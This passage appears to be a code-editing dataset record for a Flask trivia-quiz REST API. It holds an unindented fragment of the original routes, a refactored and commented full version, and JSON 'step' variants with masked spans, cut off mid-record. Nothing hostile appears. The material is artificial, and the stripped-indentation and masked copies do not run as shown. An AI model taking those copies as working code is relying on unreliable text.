@app.route('/questions/page/<int:page>', methods=['GET'])
def get_questions(page):
error = False
questions = []
total_questions = 0
if type(page) is not int:
abort(422)
if request.method == 'GET':
try:
categories = [category.type for category in Category.query.all()]
if categories is None:
abort(404)
query = Question.query.paginate(page, per_page=10)
total_questions += len(Question.query.all())
if query is None:
abort(404)
if len(query.items) == 0:
error = True
results = query.items
for question in results:
_question_ = {'id': question.id, 'question': question.
question, 'answer': question.answer, 'category':
question.category, 'difficulty': question.difficulty}
questions.append(_question_)
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(400)
else:
return jsonify({'success': True, 'questions': questions,
'total_questions': total_questions, 'categories':
categories})
else:
abort(405)
@app.route('/question/<int:question_id>', methods=['DELETE'])
def delete_question(question_id):
error = False
if request.method == 'DELETE':
if type(question_id) is not int:
abort(422)
try:
question = Question.query.get(question_id)
db.session.delete(question)
db.session.commit()
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
db.session.close()
if error:
abort(400)
else:
return jsonify({'success': True, 'method': 'Delete',
'question': question_id})
else:
abort(405)
@app.route('/questions', methods=['POST'])
def add_question():
error = False
if request.method == 'POST':
try:
new_question = Question(question=request.json['question'],
answer=request.json['answer'], category=request.json[
'category'], difficulty=request.json['difficulty'])
db.session.add(new_question)
db.session.commit()
except Exception:
error = True
db.session.rollback()
print('Error: {}'.format(sys.exc_info()))
finally:
db.session.close()
if error:
abort(400)
else:
print('Added: {}'.format(new_question))
return jsonify({'success': True, 'question': request.json})
else:
abort(405)
@app.route('/questions/search', methods=['POST'])
def search_questions():
error = False
if request.method == 'POST':
search_term = str(request.json['searchTerm'])
if type(search_term) is not str:
abort(422)
try:
query_results = Question.query.filter(Question.question.ilike(
'%{}%'.format(search_term))).all()
questions = []
categories = [category.type for category in Category.query.all()]
for question in query_results:
_question_ = {'id': question.id, 'question': question.
question, 'answer': question.answer, 'category':
question.category, 'difficulty': question.difficulty}
questions.append(_question_)
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(400)
else:
return jsonify({'success': True, 'questions': questions,
'total_questions': len(questions), 'current_category': ''})
else:
abort(405)
@app.route('/category/<int:category_id>/questions', methods=['GET'])
def get_questions_by_category(category_id):
error = False
if request.method == 'GET':
if type(category_id) is not int:
abort(422)
try:
query = Question.query.filter_by(category=str(category_id)).all()
questions = []
for question in query:
_question_ = {'id': question.id, 'question': question.
question, 'answer': question.answer, 'category':
question.category, 'difficulty': question.difficulty}
questions.append(_question_)
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(400)
else:
return jsonify({'success': True, 'questions': questions,
'total_questions': len(questions), 'current_category': ''})
else:
abort(405)
@app.route('/questions/quiz', methods=['POST'])
def quizzes():
error = False
if request.method == 'POST':
try:
data = request.json
if data['quiz_category']['id'] == 0:
query = Question.query.all()
else:
query = Question.query.filter_by(category=str(int(data[
'quiz_category']['id']) + 1)).all()
previous_questions = data['previous_questions']
index = random.randint(0, len(query) - 1)
potential_question = query[index]
selected = False
while selected is False:
if potential_question.id in previous_questions:
index = random.randint(0, len(query) - 1)
potential_question = query[index]
else:
selected = True
_question_ = potential_question
next_question = {'id': _question_.id, 'question': _question_.
question, 'answer': _question_.answer, 'category':
_question_.category, 'difficulty': _question_.difficulty}
except Exception:
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
abort(500)
else:
return jsonify({'success': True, 'question': next_question})
else:
abort(405)
@app.errorhandler(400)
def bad_request(error):
return jsonify({'success': False, 'error': 400, 'message': 'Bad Request'}
), 400
@app.errorhandler(404)
def resource_not_found(error):
return jsonify({'success': False, 'error': 404, 'message':
'Resource Not Found'}), 404
@app.errorhandler(405)
def method_not_allowed(error):
return jsonify({'success': False, 'error': 405, 'message':
'Method Not Allowed'}), 405
@app.errorhandler(422)
def unprocessable_entity(error):
return jsonify({'success': False, 'error': 422, 'message':
'Unprocessable Entity'}), 422
@app.errorhandler(500)
def internal_server_error(error):
return jsonify({'success': False, 'error': 500, 'message':
'Internal Server Error'}), 500
if __name__ == '__main__':
app.run()
<|reserved_special_token_1|>
import os
import sys
from flask import Flask, request, abort, flash, jsonify, Response
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
from flask_migrate import Migrate
import random
import unittest
from models import db, Question, Category
# number of questions served per paginated page
QUESTIONS_PER_PAGE = 10
# create and configure the app
app = Flask(__name__)
app.config.from_object('config')  # loads settings from config.py at import time
db.init_app(app)
migrate = Migrate(app, db)  # enables the `flask db` migration commands
# set up CORS for the application
# NOTE(review): r'/' only matches the root path; r'/*' was probably
# intended so every route is covered -- confirm before changing
cors = CORS(app, resources={r'/': {'origins': '*'}})
# to set Access-Control-Allow Headers and Methods
@app.after_request
def after_request(response):
    """Attach CORS allow-headers/allow-methods to every outgoing response."""
    response.headers.add('Access-Control-Allow-Headers',
        'Content-Type, Authorization, true')
    response.headers.add('Access-Control-Allow-Methods',
        'GET, PATCH,PUT,POST, DELETE, OPTIONS')
    return response
# endpoint to handle GET requests for all available categories
@app.route('/categories', methods=['GET'])
def get_categories():
    """Return the display name of every category."""
    names = []
    for cat in Category.query.all():
        names.append(cat.type)
    return jsonify({'categories': names, 'success': True})
# endpoint to handle GET requests for questions with pagination
@app.route('/questions/page/<int:page>', methods=['GET'])
def get_questions(page):
    """Return one page of questions (10 per page) plus the category list.

    Responds 400 when the page is empty/out of range or a query fails,
    405 for any non-GET method.
    """
    if request.method != 'GET':
        # send method not allowed error
        abort(405)
    # NOTE: the <int:page> route converter guarantees an int, so the old
    # `type(page) is not int` / abort(422) check could never fire.
    error = False
    questions = []
    total_questions = 0
    categories = []
    try:
        # query for all categories
        categories = [category.type for category in Category.query.all()]
        query = Question.query.paginate(page, per_page=QUESTIONS_PER_PAGE)
        # paginate() already knows the overall row count -- no need to
        # load every question just to call len() on it
        total_questions = query.total
        if len(query.items) == 0:
            # an empty page is answered with 400, matching the old behavior
            error = True
        # format data
        for question in query.items:
            questions.append({
                'id': question.id,
                'question': question.question,
                'answer': question.answer,
                'category': question.category,
                'difficulty': question.difficulty,
            })
    except Exception:
        # log on the server; the client just sees the 400 below
        error = True
        print('Error: {}'.format(sys.exc_info()))
    # BUGFIX: the old code returned from inside ``finally`` (which silently
    # suppresses in-flight exceptions) and called abort(404) inside the
    # ``try`` where ``except Exception`` swallowed it and rewrote it to a
    # 400.  Decide the response *after* the try block instead.
    if error:
        abort(400)
    return jsonify({
        'success': True,
        'questions': questions,
        'total_questions': total_questions,
        'categories': categories,
    })
# endpoint to delete a question from the database
@app.route('/question/<int:question_id>', methods=['DELETE'])
def delete_question(question_id):
    """Delete the question with *question_id*.

    Responds 404 when the question does not exist, 400 on a database
    failure, 405 for any non-DELETE method.
    """
    if request.method != 'DELETE':
        # send method not allowed error
        abort(405)
    # NOTE: the <int:question_id> converter guarantees an int already
    question = Question.query.get(question_id)
    if question is None:
        # BUGFIX: the old code passed None to session.delete() and
        # answered 400; a missing resource is properly a 404.
        abort(404)
    error = False
    try:
        # stage and commit the deletion
        db.session.delete(question)
        db.session.commit()
    except Exception:
        error = True
        # undo the partial transaction before giving up
        db.session.rollback()
        print('Error: {}'.format(sys.exc_info()))
    finally:
        # close database session
        db.session.close()
    if error:
        # send bad request error
        abort(400)
    return jsonify({
        'success': True,
        'method': 'Delete',
        'question': question_id
    })
# endpoint to add a question to the database
@app.route('/questions', methods=['POST'])
def add_question():
    """Insert a new question built from the JSON request body.

    A missing field (KeyError) or database failure yields a 400;
    any non-POST method yields a 405.
    """
    if request.method != 'POST':
        # send method not allowed error
        abort(405)
    error = False
    payload = request.json
    try:
        # format data for database; a missing key raises KeyError and is
        # reported as a 400 below
        new_question = Question(
            question=payload['question'],
            answer=payload['answer'],
            category=payload['category'],
            difficulty=payload['difficulty']
        )
        db.session.add(new_question)
        db.session.commit()
        # BUGFIX: log while the instance is still attached to the session;
        # the old code printed it after session.close(), where attribute
        # access on a detached/expired instance can raise
        print('Added: {}'.format(new_question))
    except Exception:
        # set error to true and log on the server
        error = True
        db.session.rollback()
        print('Error: {}'.format(sys.exc_info()))
    finally:
        # close database session
        db.session.close()
    if error:
        # send bad request error
        abort(400)
    return jsonify({
        'success': True,
        'question': payload
    })
# endpoint to search for questions in the database
@app.route('/questions/search', methods=['POST'])
def search_questions():
    """Case-insensitive substring search over the question text."""
    if request.method != 'POST':
        # send method not allowed error
        abort(405)
    # coerce to str; kept outside the try so a missing 'searchTerm' key
    # still surfaces as it did before.  (After str() the old
    # `type(...) is not str` check could never fail, so it is dropped.)
    search_term = str(request.json['searchTerm'])
    error = False
    questions = []
    try:
        # query database using the user-provided search term
        matches = Question.query.filter(
            Question.question.ilike('%{}%'.format(search_term))).all()
        # format response data (the old category query here was never used)
        for question in matches:
            questions.append({
                'id': question.id,
                'question': question.question,
                'answer': question.answer,
                'category': question.category,
                'difficulty': question.difficulty,
            })
    except Exception:
        # set error to true and log on the server
        error = True
        print('Error: {}'.format(sys.exc_info()))
    # BUGFIX: respond after the try block instead of returning from inside
    # ``finally``, which silently suppressed in-flight exceptions
    if error:
        abort(400)
    return jsonify({
        'success': True,
        'questions': questions,
        'total_questions': len(questions),
        'current_category': ''
    })
# endpoint to get questions by a specific category
@app.route('/category/<int:category_id>/questions', methods=['GET'])
def get_questions_by_category(category_id):
    """Return every question whose category matches *category_id*."""
    if request.method != 'GET':
        # send method not allowed error
        abort(405)
    # NOTE: the <int:category_id> converter guarantees an int, so the old
    # abort(422) check could never fire.
    error = False
    questions = []
    try:
        # category values are stored as strings in the questions table
        matches = Question.query.filter_by(category=str(category_id)).all()
        # format response data
        for question in matches:
            questions.append({
                'id': question.id,
                'question': question.question,
                'answer': question.answer,
                'category': question.category,
                'difficulty': question.difficulty,
            })
    except Exception:
        # set error to true and log on the server
        error = True
        print('Error: {}'.format(sys.exc_info()))
    # BUGFIX: respond after the try block instead of returning from inside
    # ``finally``, which silently suppressed in-flight exceptions
    if error:
        abort(400)
    return jsonify({
        'success': True,
        'questions': questions,
        'total_questions': len(questions),
        'current_category': ''
    })
# endpoint to initiate quiz
@app.route('/questions/quiz', methods=['POST'])
def quizzes():
    """Return one random question not yet in ``previous_questions``.

    Category id 0 means "all categories"; otherwise the incoming id is
    shifted by one to match the database's category values (existing
    frontend contract, preserved as-is).
    """
    if request.method != 'POST':
        # send method not allowed error
        abort(405)
    error = False
    next_question = None
    try:
        data = request.json
        # get questions from any category, or the user-specified one
        if data['quiz_category']['id'] == 0:
            pool = Question.query.all()
        else:
            pool = Question.query.filter_by(
                category=str(int(data['quiz_category']['id']) + 1)).all()
        if not pool:
            # no questions exist for this category; the old code crashed
            # in randint() here and answered 500 -- preserve that status
            error = True
        else:
            previous_questions = data['previous_questions']
            # BUGFIX: the old loop re-rolled random indexes forever once
            # every question had been used.  Sample only from the unused
            # questions and stop cleanly when none remain.
            candidates = [q for q in pool
                          if q.id not in previous_questions]
            if candidates:
                chosen = random.choice(candidates)
                next_question = {
                    'id': chosen.id,
                    'question': chosen.question,
                    'answer': chosen.answer,
                    'category': chosen.category,
                    'difficulty': chosen.difficulty,
                }
    except Exception:
        # set error and log on the server
        error = True
        print('Error: {}'.format(sys.exc_info()))
    if error:
        # send internal server error
        abort(500)
    # next_question is None when the pool is exhausted; a falsy question
    # signals the client that the quiz is over
    return jsonify({
        'success': True,
        'question': next_question
    })
# handle bad request errors
@app.errorhandler(400)
def bad_request(error):
    """JSON body and status for HTTP 400 responses."""
    payload = {'success': False, 'error': 400, 'message': 'Bad Request'}
    return jsonify(payload), 400
# handle resource not found errors
@app.errorhandler(404)
def resource_not_found(error):
    """JSON body and status for HTTP 404 responses."""
    payload = {'success': False, 'error': 404,
               'message': 'Resource Not Found'}
    return jsonify(payload), 404
# handle method not allowed errors
@app.errorhandler(405)
def method_not_allowed(error):
    """JSON body and status for HTTP 405 responses."""
    payload = {'success': False, 'error': 405,
               'message': 'Method Not Allowed'}
    return jsonify(payload), 405
# handle unprocessable entity errors
@app.errorhandler(422)
def unprocessable_entity(error):
    """JSON body and status for HTTP 422 responses."""
    payload = {'success': False, 'error': 422,
               'message': 'Unprocessable Entity'}
    return jsonify(payload), 422
# handle internal server errors
@app.errorhandler(500)
def internal_server_error(error):
    """JSON body and status for HTTP 500 responses."""
    payload = {'success': False, 'error': 500,
               'message': 'Internal Server Error'}
    return jsonify(payload), 500
# Default port:
if __name__ == '__main__':
    # Start the Flask development server with its default host/port.
    app.run()
|
flexible
|
{
"blob_id": "b84a2093a51e57c448ee7b4f5a89d69dfb14b1b6",
"index": 4876,
"step-1": "<mask token>\n\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization, true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, PATCH,PUT,POST, DELETE, OPTIONS')\n return response\n\n\n<mask token>\n\n\n@app.route('/questions/page/<int:page>', methods=['GET'])\ndef get_questions(page):\n error = False\n questions = []\n total_questions = 0\n if type(page) is not int:\n abort(422)\n if request.method == 'GET':\n try:\n categories = [category.type for category in Category.query.all()]\n if categories is None:\n abort(404)\n query = Question.query.paginate(page, per_page=10)\n total_questions += len(Question.query.all())\n if query is None:\n abort(404)\n if len(query.items) == 0:\n error = True\n results = query.items\n for question in results:\n _question_ = {'id': question.id, 'question': question.\n question, 'answer': question.answer, 'category':\n question.category, 'difficulty': question.difficulty}\n questions.append(_question_)\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'questions': questions,\n 'total_questions': total_questions, 'categories':\n categories})\n else:\n abort(405)\n\n\n@app.route('/question/<int:question_id>', methods=['DELETE'])\ndef delete_question(question_id):\n error = False\n if request.method == 'DELETE':\n if type(question_id) is not int:\n abort(422)\n try:\n question = Question.query.get(question_id)\n db.session.delete(question)\n db.session.commit()\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n db.session.close()\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'method': 'Delete',\n 'question': question_id})\n else:\n abort(405)\n\n\n@app.route('/questions', methods=['POST'])\ndef add_question():\n error = False\n if request.method == 'POST':\n 
try:\n new_question = Question(question=request.json['question'],\n answer=request.json['answer'], category=request.json[\n 'category'], difficulty=request.json['difficulty'])\n db.session.add(new_question)\n db.session.commit()\n except Exception:\n error = True\n db.session.rollback()\n print('Error: {}'.format(sys.exc_info()))\n finally:\n db.session.close()\n if error:\n abort(400)\n else:\n print('Added: {}'.format(new_question))\n return jsonify({'success': True, 'question': request.json})\n else:\n abort(405)\n\n\n<mask token>\n\n\n@app.route('/questions/quiz', methods=['POST'])\ndef quizzes():\n error = False\n if request.method == 'POST':\n try:\n data = request.json\n if data['quiz_category']['id'] == 0:\n query = Question.query.all()\n else:\n query = Question.query.filter_by(category=str(int(data[\n 'quiz_category']['id']) + 1)).all()\n previous_questions = data['previous_questions']\n index = random.randint(0, len(query) - 1)\n potential_question = query[index]\n selected = False\n while selected is False:\n if potential_question.id in previous_questions:\n index = random.randint(0, len(query) - 1)\n potential_question = query[index]\n else:\n selected = True\n _question_ = potential_question\n next_question = {'id': _question_.id, 'question': _question_.\n question, 'answer': _question_.answer, 'category':\n _question_.category, 'difficulty': _question_.difficulty}\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(500)\n else:\n return jsonify({'success': True, 'question': next_question})\n else:\n abort(405)\n\n\n<mask token>\n\n\n@app.errorhandler(405)\ndef method_not_allowed(error):\n return jsonify({'success': False, 'error': 405, 'message':\n 'Method Not Allowed'}), 405\n\n\n@app.errorhandler(422)\ndef unprocessable_entity(error):\n return jsonify({'success': False, 'error': 422, 'message':\n 'Unprocessable Entity'}), 422\n\n\n@app.errorhandler(500)\ndef internal_server_error(error):\n 
return jsonify({'success': False, 'error': 500, 'message':\n 'Internal Server Error'}), 500\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization, true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, PATCH,PUT,POST, DELETE, OPTIONS')\n return response\n\n\n@app.route('/categories', methods=['GET'])\ndef get_categories():\n categories = [category.type for category in Category.query.all()]\n return jsonify({'categories': categories, 'success': True})\n\n\n@app.route('/questions/page/<int:page>', methods=['GET'])\ndef get_questions(page):\n error = False\n questions = []\n total_questions = 0\n if type(page) is not int:\n abort(422)\n if request.method == 'GET':\n try:\n categories = [category.type for category in Category.query.all()]\n if categories is None:\n abort(404)\n query = Question.query.paginate(page, per_page=10)\n total_questions += len(Question.query.all())\n if query is None:\n abort(404)\n if len(query.items) == 0:\n error = True\n results = query.items\n for question in results:\n _question_ = {'id': question.id, 'question': question.\n question, 'answer': question.answer, 'category':\n question.category, 'difficulty': question.difficulty}\n questions.append(_question_)\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'questions': questions,\n 'total_questions': total_questions, 'categories':\n categories})\n else:\n abort(405)\n\n\n@app.route('/question/<int:question_id>', methods=['DELETE'])\ndef delete_question(question_id):\n error = False\n if request.method == 'DELETE':\n if type(question_id) is not int:\n abort(422)\n try:\n question = Question.query.get(question_id)\n db.session.delete(question)\n db.session.commit()\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n db.session.close()\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'method': 
'Delete',\n 'question': question_id})\n else:\n abort(405)\n\n\n@app.route('/questions', methods=['POST'])\ndef add_question():\n error = False\n if request.method == 'POST':\n try:\n new_question = Question(question=request.json['question'],\n answer=request.json['answer'], category=request.json[\n 'category'], difficulty=request.json['difficulty'])\n db.session.add(new_question)\n db.session.commit()\n except Exception:\n error = True\n db.session.rollback()\n print('Error: {}'.format(sys.exc_info()))\n finally:\n db.session.close()\n if error:\n abort(400)\n else:\n print('Added: {}'.format(new_question))\n return jsonify({'success': True, 'question': request.json})\n else:\n abort(405)\n\n\n@app.route('/questions/search', methods=['POST'])\ndef search_questions():\n error = False\n if request.method == 'POST':\n search_term = str(request.json['searchTerm'])\n if type(search_term) is not str:\n abort(422)\n try:\n query_results = Question.query.filter(Question.question.ilike(\n '%{}%'.format(search_term))).all()\n questions = []\n categories = [category.type for category in Category.query.all()]\n for question in query_results:\n _question_ = {'id': question.id, 'question': question.\n question, 'answer': question.answer, 'category':\n question.category, 'difficulty': question.difficulty}\n questions.append(_question_)\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'questions': questions,\n 'total_questions': len(questions), 'current_category': ''})\n else:\n abort(405)\n\n\n<mask token>\n\n\n@app.route('/questions/quiz', methods=['POST'])\ndef quizzes():\n error = False\n if request.method == 'POST':\n try:\n data = request.json\n if data['quiz_category']['id'] == 0:\n query = Question.query.all()\n else:\n query = Question.query.filter_by(category=str(int(data[\n 'quiz_category']['id']) + 1)).all()\n previous_questions = data['previous_questions']\n 
index = random.randint(0, len(query) - 1)\n potential_question = query[index]\n selected = False\n while selected is False:\n if potential_question.id in previous_questions:\n index = random.randint(0, len(query) - 1)\n potential_question = query[index]\n else:\n selected = True\n _question_ = potential_question\n next_question = {'id': _question_.id, 'question': _question_.\n question, 'answer': _question_.answer, 'category':\n _question_.category, 'difficulty': _question_.difficulty}\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(500)\n else:\n return jsonify({'success': True, 'question': next_question})\n else:\n abort(405)\n\n\n<mask token>\n\n\n@app.errorhandler(405)\ndef method_not_allowed(error):\n return jsonify({'success': False, 'error': 405, 'message':\n 'Method Not Allowed'}), 405\n\n\n@app.errorhandler(422)\ndef unprocessable_entity(error):\n return jsonify({'success': False, 'error': 422, 'message':\n 'Unprocessable Entity'}), 422\n\n\n@app.errorhandler(500)\ndef internal_server_error(error):\n return jsonify({'success': False, 'error': 500, 'message':\n 'Internal Server Error'}), 500\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization, true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, PATCH,PUT,POST, DELETE, OPTIONS')\n return response\n\n\n@app.route('/categories', methods=['GET'])\ndef get_categories():\n categories = [category.type for category in Category.query.all()]\n return jsonify({'categories': categories, 'success': True})\n\n\n@app.route('/questions/page/<int:page>', methods=['GET'])\ndef get_questions(page):\n error = False\n questions = []\n total_questions = 0\n if type(page) is not int:\n abort(422)\n if request.method == 'GET':\n try:\n categories = [category.type for category in Category.query.all()]\n if categories is None:\n abort(404)\n query = Question.query.paginate(page, per_page=10)\n total_questions += len(Question.query.all())\n if query is None:\n abort(404)\n if len(query.items) == 0:\n error = True\n results = query.items\n for question in results:\n _question_ = {'id': question.id, 'question': question.\n question, 'answer': question.answer, 'category':\n question.category, 'difficulty': question.difficulty}\n questions.append(_question_)\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'questions': questions,\n 'total_questions': total_questions, 'categories':\n categories})\n else:\n abort(405)\n\n\n@app.route('/question/<int:question_id>', methods=['DELETE'])\ndef delete_question(question_id):\n error = False\n if request.method == 'DELETE':\n if type(question_id) is not int:\n abort(422)\n try:\n question = Question.query.get(question_id)\n db.session.delete(question)\n db.session.commit()\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n db.session.close()\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'method': 
'Delete',\n 'question': question_id})\n else:\n abort(405)\n\n\n@app.route('/questions', methods=['POST'])\ndef add_question():\n error = False\n if request.method == 'POST':\n try:\n new_question = Question(question=request.json['question'],\n answer=request.json['answer'], category=request.json[\n 'category'], difficulty=request.json['difficulty'])\n db.session.add(new_question)\n db.session.commit()\n except Exception:\n error = True\n db.session.rollback()\n print('Error: {}'.format(sys.exc_info()))\n finally:\n db.session.close()\n if error:\n abort(400)\n else:\n print('Added: {}'.format(new_question))\n return jsonify({'success': True, 'question': request.json})\n else:\n abort(405)\n\n\n@app.route('/questions/search', methods=['POST'])\ndef search_questions():\n error = False\n if request.method == 'POST':\n search_term = str(request.json['searchTerm'])\n if type(search_term) is not str:\n abort(422)\n try:\n query_results = Question.query.filter(Question.question.ilike(\n '%{}%'.format(search_term))).all()\n questions = []\n categories = [category.type for category in Category.query.all()]\n for question in query_results:\n _question_ = {'id': question.id, 'question': question.\n question, 'answer': question.answer, 'category':\n question.category, 'difficulty': question.difficulty}\n questions.append(_question_)\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'questions': questions,\n 'total_questions': len(questions), 'current_category': ''})\n else:\n abort(405)\n\n\n<mask token>\n\n\n@app.route('/questions/quiz', methods=['POST'])\ndef quizzes():\n error = False\n if request.method == 'POST':\n try:\n data = request.json\n if data['quiz_category']['id'] == 0:\n query = Question.query.all()\n else:\n query = Question.query.filter_by(category=str(int(data[\n 'quiz_category']['id']) + 1)).all()\n previous_questions = data['previous_questions']\n 
index = random.randint(0, len(query) - 1)\n potential_question = query[index]\n selected = False\n while selected is False:\n if potential_question.id in previous_questions:\n index = random.randint(0, len(query) - 1)\n potential_question = query[index]\n else:\n selected = True\n _question_ = potential_question\n next_question = {'id': _question_.id, 'question': _question_.\n question, 'answer': _question_.answer, 'category':\n _question_.category, 'difficulty': _question_.difficulty}\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(500)\n else:\n return jsonify({'success': True, 'question': next_question})\n else:\n abort(405)\n\n\n@app.errorhandler(400)\ndef bad_request(error):\n return jsonify({'success': False, 'error': 400, 'message': 'Bad Request'}\n ), 400\n\n\n@app.errorhandler(404)\ndef resource_not_found(error):\n return jsonify({'success': False, 'error': 404, 'message':\n 'Resource Not Found'}), 404\n\n\n@app.errorhandler(405)\ndef method_not_allowed(error):\n return jsonify({'success': False, 'error': 405, 'message':\n 'Method Not Allowed'}), 405\n\n\n@app.errorhandler(422)\ndef unprocessable_entity(error):\n return jsonify({'success': False, 'error': 422, 'message':\n 'Unprocessable Entity'}), 422\n\n\n@app.errorhandler(500)\ndef internal_server_error(error):\n return jsonify({'success': False, 'error': 500, 'message':\n 'Internal Server Error'}), 500\n\n\n<mask token>\n",
"step-4": "<mask token>\napp.config.from_object('config')\ndb.init_app(app)\n<mask token>\n\n\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization, true')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, PATCH,PUT,POST, DELETE, OPTIONS')\n return response\n\n\n@app.route('/categories', methods=['GET'])\ndef get_categories():\n categories = [category.type for category in Category.query.all()]\n return jsonify({'categories': categories, 'success': True})\n\n\n@app.route('/questions/page/<int:page>', methods=['GET'])\ndef get_questions(page):\n error = False\n questions = []\n total_questions = 0\n if type(page) is not int:\n abort(422)\n if request.method == 'GET':\n try:\n categories = [category.type for category in Category.query.all()]\n if categories is None:\n abort(404)\n query = Question.query.paginate(page, per_page=10)\n total_questions += len(Question.query.all())\n if query is None:\n abort(404)\n if len(query.items) == 0:\n error = True\n results = query.items\n for question in results:\n _question_ = {'id': question.id, 'question': question.\n question, 'answer': question.answer, 'category':\n question.category, 'difficulty': question.difficulty}\n questions.append(_question_)\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'questions': questions,\n 'total_questions': total_questions, 'categories':\n categories})\n else:\n abort(405)\n\n\n@app.route('/question/<int:question_id>', methods=['DELETE'])\ndef delete_question(question_id):\n error = False\n if request.method == 'DELETE':\n if type(question_id) is not int:\n abort(422)\n try:\n question = Question.query.get(question_id)\n db.session.delete(question)\n db.session.commit()\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n db.session.close()\n if 
error:\n abort(400)\n else:\n return jsonify({'success': True, 'method': 'Delete',\n 'question': question_id})\n else:\n abort(405)\n\n\n@app.route('/questions', methods=['POST'])\ndef add_question():\n error = False\n if request.method == 'POST':\n try:\n new_question = Question(question=request.json['question'],\n answer=request.json['answer'], category=request.json[\n 'category'], difficulty=request.json['difficulty'])\n db.session.add(new_question)\n db.session.commit()\n except Exception:\n error = True\n db.session.rollback()\n print('Error: {}'.format(sys.exc_info()))\n finally:\n db.session.close()\n if error:\n abort(400)\n else:\n print('Added: {}'.format(new_question))\n return jsonify({'success': True, 'question': request.json})\n else:\n abort(405)\n\n\n@app.route('/questions/search', methods=['POST'])\ndef search_questions():\n error = False\n if request.method == 'POST':\n search_term = str(request.json['searchTerm'])\n if type(search_term) is not str:\n abort(422)\n try:\n query_results = Question.query.filter(Question.question.ilike(\n '%{}%'.format(search_term))).all()\n questions = []\n categories = [category.type for category in Category.query.all()]\n for question in query_results:\n _question_ = {'id': question.id, 'question': question.\n question, 'answer': question.answer, 'category':\n question.category, 'difficulty': question.difficulty}\n questions.append(_question_)\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'questions': questions,\n 'total_questions': len(questions), 'current_category': ''})\n else:\n abort(405)\n\n\n@app.route('/category/<int:category_id>/questions', methods=['GET'])\ndef get_questions_by_category(category_id):\n error = False\n if request.method == 'GET':\n if type(category_id) is not int:\n abort(422)\n try:\n query = Question.query.filter_by(category=str(category_id)).all()\n questions = []\n for 
question in query:\n _question_ = {'id': question.id, 'question': question.\n question, 'answer': question.answer, 'category':\n question.category, 'difficulty': question.difficulty}\n questions.append(_question_)\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(400)\n else:\n return jsonify({'success': True, 'questions': questions,\n 'total_questions': len(questions), 'current_category': ''})\n else:\n abort(405)\n\n\n@app.route('/questions/quiz', methods=['POST'])\ndef quizzes():\n error = False\n if request.method == 'POST':\n try:\n data = request.json\n if data['quiz_category']['id'] == 0:\n query = Question.query.all()\n else:\n query = Question.query.filter_by(category=str(int(data[\n 'quiz_category']['id']) + 1)).all()\n previous_questions = data['previous_questions']\n index = random.randint(0, len(query) - 1)\n potential_question = query[index]\n selected = False\n while selected is False:\n if potential_question.id in previous_questions:\n index = random.randint(0, len(query) - 1)\n potential_question = query[index]\n else:\n selected = True\n _question_ = potential_question\n next_question = {'id': _question_.id, 'question': _question_.\n question, 'answer': _question_.answer, 'category':\n _question_.category, 'difficulty': _question_.difficulty}\n except Exception:\n error = True\n print('Error: {}'.format(sys.exc_info()))\n finally:\n if error:\n abort(500)\n else:\n return jsonify({'success': True, 'question': next_question})\n else:\n abort(405)\n\n\n@app.errorhandler(400)\ndef bad_request(error):\n return jsonify({'success': False, 'error': 400, 'message': 'Bad Request'}\n ), 400\n\n\n@app.errorhandler(404)\ndef resource_not_found(error):\n return jsonify({'success': False, 'error': 404, 'message':\n 'Resource Not Found'}), 404\n\n\n@app.errorhandler(405)\ndef method_not_allowed(error):\n return jsonify({'success': False, 'error': 405, 'message':\n 'Method Not Allowed'}), 
405\n\n\n@app.errorhandler(422)\ndef unprocessable_entity(error):\n return jsonify({'success': False, 'error': 422, 'message':\n 'Unprocessable Entity'}), 422\n\n\n@app.errorhandler(500)\ndef internal_server_error(error):\n return jsonify({'success': False, 'error': 500, 'message':\n 'Internal Server Error'}), 500\n\n\nif __name__ == '__main__':\n app.run()\n",
